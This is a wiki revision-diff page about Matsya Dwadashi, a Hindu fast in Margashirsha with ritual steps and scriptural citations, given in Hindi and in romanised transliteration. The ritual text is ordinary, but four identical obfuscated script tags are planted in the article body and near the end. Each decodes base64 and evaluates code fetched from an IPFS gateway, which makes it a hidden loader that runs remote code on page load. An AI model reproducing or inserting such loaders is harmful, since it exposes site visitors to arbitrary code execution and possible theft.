Difference between revisions of "मत्स्य द्वादशी"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
('*भारत में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा ...' के साथ नया पन्ना बनाया)
 
m (Text replace - ")</ref" to "</ref")
 
(7 intermediate revisions by 4 users not shown)
Line 1: Line 1:
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लखित [[हिन्दू धर्म]] का एक [[व्रत]] संस्कार है।  
+
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक [[व्रत]] संस्कार है।  
 
*[[मार्गशीर्ष]] [[शुक्ल पक्ष|शुक्ल]] [[दशमी]] पर नियमों का पालन करके यह व्रत किया जाता है।  
 
*[[मार्गशीर्ष]] [[शुक्ल पक्ष|शुक्ल]] [[दशमी]] पर नियमों का पालन करके यह व्रत किया जाता है।  
 
*[[एकादशी]] पर [[उपवास]]; [[द्वादशी]] को मन्त्र के साथ मिट्टी लाना और उसे [[आदित्य]] को अर्पित करना, शरीर पर लगाना एवं स्नान करना।  
 
*[[एकादशी]] पर [[उपवास]]; [[द्वादशी]] को मन्त्र के साथ मिट्टी लाना और उसे [[आदित्य]] को अर्पित करना, शरीर पर लगाना एवं स्नान करना।  
 
*तिथिव्रत; नारायण पूजा; चार घटों को पुष्पों के साथ जल से भरना, उन्हें तिल की खली से ढँकना तथा उन्हें चार समुद्र के रूप में जानना।  
 
*तिथिव्रत; नारायण पूजा; चार घटों को पुष्पों के साथ जल से भरना, उन्हें तिल की खली से ढँकना तथा उन्हें चार समुद्र के रूप में जानना।  
 
*[[विष्णु]] की मछली के रूप में स्वर्ण प्रतिमा का निर्माण तथा पूजा; जागर; चारों घटों का दानकरना चाहिए।  
 
*[[विष्णु]] की मछली के रूप में स्वर्ण प्रतिमा का निर्माण तथा पूजा; जागर; चारों घटों का दानकरना चाहिए।  
*इस व्रत को करने से महापातक भी नष्ट हो जाते हैं <ref>कृत्यकल्पतरु (व्रत0 311-317)</ref>; <ref>हेमाद्रि (व्रत0 1, 1022-26, वराहपुराण 39|26-77)</ref>; <ref>कृत्यरत्नाकर (462-466, ब्रह्मपुराण से वे ही श्लोक उद्धृत हैं)</ref>
+
*इस व्रत को करने से महापातक भी नष्ट हो जाते हैं।<ref>कृत्यकल्पतरु (व्रतखण्ड 311-317</ref>; <ref>हेमाद्रि (व्रत0 1, 1022-26, [[वराह पुराण]] 39|26-77</ref>; <ref>कृत्यरत्नाकर (462-466, [[ब्रह्म पुराण]] से वे ही श्लोक उद्धृत हैं</ref>
  
  
  
{{लेख प्रगति
+
{{संदर्भ ग्रंथ}}
|आधार=आधार1
 
|प्रारम्भिक=
 
|माध्यमिक=
 
|पूर्णता=
 
|शोध=
 
}}
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
==संबंधित लिंक==
+
==संबंधित लेख==
 
{{पर्व और त्योहार}}
 
{{पर्व और त्योहार}}
 
{{व्रत और उत्सव}}
 
{{व्रत और उत्सव}}

Latest revision as of 12:54, 27 July 2011

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • margashirsh shukl dashami par niyamoan ka palan karake yah vrat kiya jata hai.
  • ekadashi par upavas; dvadashi ko mantr ke sath mitti lana aur use adity ko arpit karana, sharir par lagana evan snan karana.
  • tithivrat; narayan pooja; char ghatoan ko pushpoan ke sath jal se bharana, unhean til ki khali se dhankana tatha unhean char samudr ke roop mean janana.
  • vishnu ki machhali ke roop mean svarn pratima ka nirman tatha pooja; jagar; charoan ghatoan ka danakarana chahie.
  • is vrat ko karane se mahapatak bhi nasht ho jate haian.[1]; [2]; [3]


<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

  1. krityakalpataru (vratakhand 311-317
  2. hemadri (vrat0 1, 1022-26, varah puran 39|26-77
  3. krityaratnakar (462-466, brahm puran se ve hi shlok uddhrit haian

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>